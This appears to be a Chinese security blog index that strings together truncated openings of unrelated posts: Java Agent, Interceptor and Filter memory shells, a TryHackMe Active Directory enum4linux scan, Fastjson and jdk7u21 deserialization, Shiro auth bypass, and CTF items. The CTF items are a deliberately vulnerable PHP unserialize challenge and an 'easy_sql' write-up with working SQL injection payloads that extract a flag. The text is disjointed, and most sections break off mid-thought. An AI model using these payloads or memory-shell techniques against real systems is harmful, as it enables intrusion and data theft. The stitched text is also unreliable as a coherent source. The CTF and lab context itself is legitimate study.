Java Agent

在 jdk 1.5 之后引入了 java.lang.instrument 包，该包提供了检测 java 程序的 Api，比如用于监控、收集性能信息、诊断问题，通过 java.lang.instrument 实现的工具我们称之为 Java Agent ，Java Agent 能够在不影响正常编译的情况下来修改字节码，即动态修改已加载或者未加载的类，包括类的属性、方法

Agent 内存马的实现就是利用了这一特性使其动态修改特定类的特定方法，将我们的恶意方法添加进去

说白了 Java Agent 只是一个 Java 类而已，只不过普通的 Java 类是以 main 函数作为入口点的，Java Agent 的入口点则是 premain 和 agentmain

Java Agent 支持两种方式进行加载：

1. 实现 premain 方法，在启动时进行加载 （该特性在 jdk 1.5 之后才有）
2. 实现 agentmain 方法，在启动后进行加载 （该特性在 jdk 1.6 之后才有）

Interceptor Memory Shell

实例

JDK 1.8.0_20，采用FastJson 1.2.47的RCE来创造反序列化漏洞利用点

创建springboot项目

TL;DR

本系列主要是补以前落下的知识，参考了很多大师傅的文章，非常感谢师傅们的分享

Filter Memory Shell

实例

我这里使用的是idea 2021.2，maven quickstart

Task 3 Welcome to Attacktive Directory

nmap扫描端口

enum4linux获取139/445信息，这个工具有探查端口信息，枚举用户名的功能

1

enum4linux -A 10.10.28.202

众所周知，在 Fastjson中 parse 会识别并调用目标类的特定 setter 方法及特定的 getter 方法，特定规则其实总结起来就是一般的setter方法以及一般的返回值类型继承自Collection Map AtomicBoolean AtomicInteger AtomicLong的getter方法

那么对于一般的不满足条件的getter方法能否进行调用呢

WEB

serialize

index.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43

<?php
error_reporting(0);
highlight_file(__FILE__);
 
class Demo{
    public $class;
    public $user;
    public function __construct()
    {
        $this->class = "safe";
        $this->user = "ctfer";
        $context = new $this->class ($this->user);
        foreach($context as $f){
            echo $f;
        }
    }
 
    public function __wakeup()
    {
        $context = new $this->class ($this->user);
        foreach($context as $f){
            echo $f;
        }
    }
 
}
class safe{
    var $user;
    public function __construct($user)
    {
        $this->user = $user;
        echo ("hello ".$this->user);
    }
}
 
 
if(isset($_GET['data'])){
    unserialize($_GET['data']);
}
else{
    $demo=new Demo;
 
}

Fastjson 是一个 Java 库，可以将 Java 对象转换为 JSON 格式，当然它也可以将 JSON 字符串转换为 Java 对象。

Fastjson 可以操作任何 Java 对象，即使是一些预先存在的没有源码的对象。

Fastjson组件

Fastjson使用包含如下几个核心函数

1
2
3
4
5
6

//序列化
String text = JSON.toJSONString(obj);
//反序列化
VO vo = JSON.parse(); //解析为JSONObject类型或者JSONArray类型
VO vo = JSON.parseObject("{...}"); //JSON文本解析成JSONObject类型
VO vo = JSON.parseObject("{...}", VO.class); //JSON文本解析成VO.class类

pom.xml

1
2
3
4
5

<dependency>
  <groupId>com.alibaba</groupId>
  <artifactId>fastjson</artifactId>
  <version>1.2.24</version>
</dependency>

在ysoserial 的payloads目录下 有一个jdk7u21，以往的反序列化Gadget都是需要借助第三方库才可以成功执行，但是jdk7u21的Gadget执行过程中所用到的所有类都存在在JDK中

影响版本：

• JDK <= 7u21

测试环境：

• JDK 7u21

pom.xml

1
2
3
4
5

<dependency>
  <groupId>javassist</groupId>
  <artifactId>javassist</artifactId>
  <version>3.12.0.GA</version>
</dependency>

需要添加javassist依赖

权限绕过

环境搭建

基于此源码：https://github.com/l3yx/springboot-shiro

导入idea，application.properties添加

1

server.servlet.context-path=/test

因为pom.xml里排除了springboot内置的tomcat，新建Configurations->Tomcat Server，添加新的deployment，并设置context为/test，然后运行即可

Shiro基础

Shiro验证

1
2

anon 不需要验证，可以直接访问
authc 需要验证，也就是我们需要bypass的地方

Shiro的URL路径表达式为Ant格式

1
2
3
4

/hello 只匹配url http://demo.com/hello
/h?      只匹配url  http://demo.com/h+任意一个字符
/hello/*  匹配url下 http://demo.com/hello/xxxx的任意内容，不匹配多个路径
/hello/** 匹配url下 http://demo.com/hello/xxxx/aaaa的任意内容，匹配多个路径

easy_sql

报错注入，盲猜flag表，但不知道名称，用重复column名爆列名

参考：无列名注入小记

1

uname=%27)/**/||/**/(select/**/1/**/from/**/flag/**/where(select/**/*/**/from(select/**/*/**/from/**/flag/**/as a/**/join/**/flag/**/as/**/b/**/using(id,no))as/**/c))/**/or/**/('1&passwd=1&Submit=%E7%99%BB%E5%BD%95

1
2
3

uname=%27)/**/and/**/extractvalue(1,concat(0x7e,(select/**/substr(`e691d77e-5da1-409b-a37b-ff4edfa14123`,31)/**/from/**/flag),0x7e))/**/and/**/('0&passwd=1&Submit=%E7%99%BB%E5%BD%95

uname=%27)/**/and/**/extractvalue(1,concat(0x7e,(select/**/substr(`e691d77e-5da1-409b-a37b-ff4edfa14123`)/**/from/**/flag),0x7e))/**/and/**/('0&passwd=1&Submit=%E7%99%BB%E5%BD%95

读出flag CISCN{9fO5F-WC2YL-GY3zM-R4aIu-kAjxU-}